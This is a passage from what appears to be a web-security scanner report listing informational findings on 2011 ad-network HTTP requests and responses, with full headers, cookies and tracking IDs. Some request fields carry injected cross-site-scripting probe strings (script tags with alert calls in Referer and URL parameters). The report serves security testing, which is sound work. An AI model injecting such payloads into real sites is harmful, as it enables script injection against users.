Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

25.13. http://ad.doubleclick.net/pfadx/fansided_cim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/fansided_cim/

Request

GET /pfadx/fansided_cim/;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;ord=1307962894346? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 963
DCLK_imp: v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;~cs=k
Date: Mon, 13 Jun 2011 11:01:43 GMT

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;positio
...[SNIP]...

25.14. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Request

Response

25.15. http://adserver.veruta.com/cookiematch.fcgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.veruta.com
Path:	/cookiematch.fcgi

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

25.16. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Request

GET /adscgen/st.php?survey_num=893515&site=61505218&code=41197792&randnum=7900888 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:34:29 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 900
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

var DL_ktagParm = new Array();
DL_kt
...[SNIP]...

25.17. http://bidnw.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bidnw.ru4.com
Path:	/nf

Request

Response

25.18. http://bn.xp1.ru4.com/nf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bn.xp1.ru4.com
Path:	/nf

Request

Response

25.19. http://bpx.a9.com/amzn/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bpx.a9.com
Path:	/amzn/iframe.html

Request

GET /amzn/iframe.html HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats="IhRhDcnYghU7pyAAbsxd5XOwPlefXNwxj18ImLznjwOzgr5QgO2uH28pH0LJquSV7BiZK4aJt10="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"303-1298572470000"
Last-Modified: Thu, 24 Feb 2011 18:34:30 GMT
Content-Type: text/html
Content-Length: 303
Date: Mon, 13 Jun 2011 11:25:47 GMT

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html>
<body scrolling='no' frameborder='0' marginheight='0' marginwidth='0' ma
...[SNIP]...

25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

25.21. http://cdn-bpx.a9.com/amzn/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-bpx.a9.com
Path:	/amzn/iframe.html

Request

GET /amzn/iframe.html HTTP/1.1
Host: cdn-bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: Ik3MKWxHhUGwxlshENObYBeRysFtJ6/hE3OXN1MxwWm/GqCNuv6sU0fDP9XL8gEu
x-amz-request-id: B96C1E9D73AAE635
Date: Wed, 01 Jun 2011 01:47:03 GMT
x-amz-meta-content-encoding: gzip
x-amz-meta-content-type: text/html
x-amz-meta-group: 1896053708
x-amz-meta-owner: 901924212
x-amz-meta-permissions: 33188
Last-Modified: Thu, 20 Jan 2011 07:29:52 GMT
ETag: "6790df878721cdefdc20a1972e8775bf"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 307
Server: AmazonS3
Age: 47559
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 584769cb06ac3701d6be3582495f47b02e7ab884d048f7550187c569ca56d74fb3086b4f302f2fa9
Via: 1.0 0d7b1152406e5cb2163da628da236c20.cloudfront.net:11180 (CloudFront), 1.0 0a864114bbd5655c745ca701bc25e858.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'><html>
<body scrolling='no' frameborder='0' marginheight='0' marginwidth='0' ma
...[SNIP]...

25.22. http://cdn.apture.com/media/html/aptureLoadIframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.apture.com
Path:	/media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=33513556 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=s4te21hWKP

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:05 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n23.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Thu, 16 Jun 2011 18:32:33 GMT
Age: 319892
Content-Length: 1863
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1863
Last-Modified: Thu, 09 Jun 2011 18:23:03 GMT
Connection: keep-alive



<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...

25.23. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content1.admonkey.dapper.net
Path:	/clients/expedia/Infosite_US.html

Request

GET /clients/expedia/Infosite_US.html HTTP/1.1
Host: content1.admonkey.dapper.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u=F398C033545B4D3D89FE3B1CF839F8D4;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium%20Hilton;u7=2%7C0;u6=1;u4=20110714%7C20110718;u1=Hotel;u2=178293;ord=8825947351288.05?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=5475024508341082; data="t2997hl6mqwKdXBbLghjH4iNRJiaNplOFZteq17dN+04WBQ7POe1xiqZwg6jQQqGCdvea81aTTngXoB1effP24/o8t7Kk5qakS2tBrXVWsIS2N9epWyRgr9Hskmgg6asdvzUp30lx2OOvweqv4b3lh4UjgFQ1SljDdMjX4dkzfWwzHLEXJVEsyFuotD4gWKnsa7eTY/yePhXksT2sEVWYEuq0mC8Py7yRNQde7kVHCuKQh8hATywsCQfSL9WHWulqTVfip7NEVtDOJzbNOGfjkuq0mC8Py7ysRdeLFb5jjgAyAC3AeQF+KW4V2BUSJCMOQGu4P7lWwY8IRLONx92D3DIC8xxBVl700iU15O/PaoqmcIOo0EKhvYDeSkZ1HSElfQRGstwQB3oIi+42wUdMaj1IDgcHRS4Fk1R5rL+JH8OUfsKR9KdR4Nw09rYMyNoKpnCDqNBCoZsX8o0TjWgtMbC8X+fiI0uCJoCh1nQFgoKZzfXPgjTryqZwg6jQQqGnVKFA5GOptN6yhkJEQNaV9GW2/+W9FSlGrNqXF7MyOYlGQQV+dXCm7DMcsRclUSzuX5r5ieUUDGGei7cDwZeZSQfSL9WHWulWWk4maAULqzP89ZSjrgSu0NtT4jKZBD46CIvuNsFHTGOYzzT1UqsWNonAc0D+/an6CIvuNsFHTGTiSEPgwrxvyA3If58TzxtsMxyxFyVRLNvaaCFJTZirT08ECHxq6ImcINCtLRl7JwTbyDW4u+dZFbJGuDWu8ySMsfdmuKUErZ/pj0CTCte8A!!"; last_modified=1307043853770

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Mon, 13 Jun 2011 11:27:26 GMT
Content-Type: text/html
Connection: keep-alive
ETag: "a123520f93f435158bffb3b4123e3d12"
X-CF1: fA.iad2:cf:cacheD.iad2-01
Last-Modified: Fri, 03 Jun 2011 22:13:07 GMT
X-CF2: L
Content-Length: 2555

<html>
<body>
<script type='text/javascript'>

var cookieTTL = 365; // TTL in days

// var COOKIE_NAME = intent.getFieldValue("adId") + '_bucket';
var COOKIE_NAME = "expedia" + '_bucket';

function lo
...[SNIP]...

25.24. http://creativeby1.unicast.com/script/V3.00/deliver2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creativeby1.unicast.com
Path:	/script/V3.00/deliver2.html

Request

GET /script/V3.00/deliver2.html?pid=69087&cid=13220&pub=65&a=426862&VwDebug=false&pc=425702&exp=%27070111%27&fc=false&sc=false&png='http%253A//ping1.unicast.com/adstracking.gif%253FDV%253D3.80%2526PT%253DI%2526AD%253D426862%2526VD%253D0%2526AV%253D_AV_%2526PV%253D_PV_%2526CV%253D_CV_%2526RV%253D_RV_%2526UV%253D_UV_%2526UC%253D_UC_%2526VP%253D0.0.0.0%2526VU%253D_VU_%2526RD%253D3278409____CH%253D'&pip='http%253A//ad.doubleclick.net/imp%253Bv7%253Bj%253B236573386%253B0-0%253B1%253B27141466%253B0/0%253B41612945/41630732/1%253B%253B%257Eaopt%253D2/1/57/0%253B%257Eokv%253D%253Baid%253D15917%253Bsz%253D728x90%253Bpath%253D2011%253Bpath%253D06%253Bpath%253D13%253Bpath%253Dgame-of-thrones-watch-its-all-in-the-execution-2%253Bdcove%253Dd%253Bdcopt%253Dist%253Bpgurl%253D1%253Btile%253D1%253B%257Ecs%253Dv%25253fhttp%253A//s0.2mdn.net/dot.gif%3F1307963898594'&tpi='http%253A//ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23%253Bsz%253D1x1%253Bord%253D%253F%3F1307963898594'&rd=0.9168381718918681 HTTP/1.1
Host: creativeby1.unicast.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VWCUKG300=L0/Q72066_13570_1832_052711_1_060511_441651x436658x052711x1x1/Q72053_13570_1832_052111_1_060511_441669x436656x052111x1x1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 10:58:44 GMT
Server: lighttpd
Content-Type: text/html
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
ETag: "498629554"
Last-Modified: Mon, 28 Feb 2011 17:56:59 GMT
P3P: policyref="/w3c/policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Age: 1455
Cache-Control: max-age=1800
Via: HTTP/1.1 creativeby1.unicast.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 13 Jun 2011 11:28:44 GMT
Via: 1.1 bfi107105 (MII-APC/1.6)
Content-Length: 8778

<html><head><script language="javascript">var VwVer="V3.00",VwBld="3.8_013 [02 28 2011]";var VwInDeliver2=true;String.prototype.VwIx=function(s){return this.toLowerCase().indexOf(s.toLowerCase());}
St
...[SNIP]...

25.25. http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d13.zedo.com
Path:	/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html

Request

GET /OzoDB/cutils/R53_5_5/jsc/1190/zpu.html?n=1190;f=1;z=2-110 HTTP/1.1
Host: d13.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4; FFcat=826,276,14:1190,1,14; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 1340
Cache-Control: max-age=2248216
Expires: Sat, 09 Jul 2011 11:32:19 GMT
Date: Mon, 13 Jun 2011 11:02:03 GMT
Connection: close

<html>
<body>
<SCRIPT LANGUAGE="JavaScript">
var zcc7=new Array();var zcd9=0;
function zCF5(zcw1){
if(zcd9<1){
var zct3=''+window.location.search;var zcv4=new Array();var zcd3=zct3.indexOf(';l=')+1;
i
...[SNIP]...

25.26. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190 HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html?n=1190;f=1;z=2-110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4; FFcat=826,276,14:1190,1,14; FFad=0:0; aps=0

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Jun 2011 12:17:16 GMT
ETag: "22020f4-a4c-4a4a5804e0b00"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2636
Cache-Control: max-age=181805
Expires: Wed, 15 Jun 2011 13:32:08 GMT
Date: Mon, 13 Jun 2011 11:02:03 GMT
Connection: close


<html>
<head>
<script language="JavaScript">
var q2=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

25.27. http://d3l3lkinz3f56t.cloudfront.net/dclk1-0.9.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3l3lkinz3f56t.cloudfront.net
Path:	/dclk1-0.9.html

Request

GET /dclk1-0.9.html HTTP/1.1
Host: d3l3lkinz3f56t.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amazon.pilot/;cid=ancestry300x250cpcbusinessman;sz=300x250;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4QtFaLD3-qLhFOR5a43VWKXJK0PXXEk2cT-DTrNCf3aMph9Q4-5cbsOwXAfD-sUqzLdBOaVnkudgjugAWbwhqccZiiTcTYiqS5viFUX2IH.SsINQbNqFdGDythAd1HRglldMd6z-r5sGCb9w1P6Y5nsW4iNkgunIyGJIfBIxnCx5OXvyEk9NnzWGo7ExTmI4.CVmLKgcZ4iLUW-ijUSDTDZ3JiDr0wI-mG0UrKRoj9-iER1cQK4lmPxTdA6iMiN.5KctCSN68it3TTxatklMcXbwRZ2B3hhgkaOytVWDQ2DwPrkWaw8PZX28u7S6LhlXBUwW-HXBMSNucFjhACcFTFWaf-oiKZhMoDIxHWSqF9X0avDOz07ZTnXdsw5MqRSVCAE2QfIbZsdloCArYOoYuMFVADJ-aB44-pg3hmyXI3641Lw.RkgDajyx-PG1aYGn8VVKcbd3XZ6YPWt-SIE2wIhh0B.1A8QrC.-AerJEvBrPcU6jc0IuZYqoxZiEAIczrX-rLpKkpW3GF0zbfwfdnrRmz9TnSUdqQ0Au-7ZnWtrw7ihz6WQiFAa-rjLgNqLVvBo4GLSwnPz4ag36qEpjmQgSyOoJYtNe1zRN6.HWGmrQjfganbNbhOqOJDmL0KyA1-2p8A9R84UQaRI0NITt2OPcnVZ6tF3IYCx7B8Zf4jzG62zOb1M8XreTgo23x2kXEv9xJOG9v3H6AANabLnq8Yj27NIGCqBwLw9h.43nvZuOojPdgL8SeAu95nLYySegNlmHfd5NWqST8mRyAVbvjUv-vPHQNflkwSWVxcOYQR1&d=;ord=5,526,548,161,987,205,177?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1689327821-1306617928745

Response

HTTP/1.0 200 OK
x-amz-id-2: yQQDeXBdyX784yRpKxpDEe5042HVZmvl15Epd8fAieYThBqgvxxq+GjnoN6OCKRp
x-amz-request-id: B3324CE6472A45CD
Date: Fri, 10 Jun 2011 03:09:33 GMT
x-amz-meta-s3fox-filesize: 2483
x-amz-meta-s3fox-modifiedtime: 1285878098026
Last-Modified: Thu, 30 Sep 2010 20:30:51 GMT
ETag: "6c84710d6c994faef93162b9cfdd60d5"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2483
Server: AmazonS3
Age: 40596
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 416afb8640368d7453c29bee67677ea349fbf8a350d70187c834e41ef34176faa40ee5ee43a21655
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 adb98434f7f6c7779cfa1f6e589d5cf9.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<script type="text/javascript">
function cfpParam(name) {
var regex = new RegExp("[#]" + name + "=([^\\?&#]*)");
var t = window.location.href;
var loc=t.replace(/%23/g,"#");

...[SNIP]...

25.28. http://data.nba.com/data/html/gdyn/gdyn_nba.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.nba.com
Path:	/data/html/gdyn/gdyn_nba.html

Request

GET /data/html/gdyn/gdyn_nba.html HTTP/1.1
Host: data.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:01:00 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: max-age=10, public
Content-Length: 2368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>

...[SNIP]...

25.29. http://ds.addthis.com/red/psi/sites/idolator.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/idolator.com/p.json

Request

GET /red/psi/sites/idolator.com/p.json?callback=_ate.ad.hpr&uid=4dce8a530508b02d&url=http%3A%2F%2Fidolator.com%2Fwp-content2f889%2522%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253Ed06b96a1bc7%2Fthemes%2Fidolator_1.5%2Fimages%2Ffavicon.ico&ref=http%3A%2F%2Fburp%2Fshow%2F6&1kegm6v HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1306359996.1OD|1307911311.60|1307911311.1EY; dt=X; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 13 Jun 2011 11:32:48 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 13 Jul 2011 11:32:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 13 Jun 2011 11:32:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:32:48 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

25.30. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php previous next

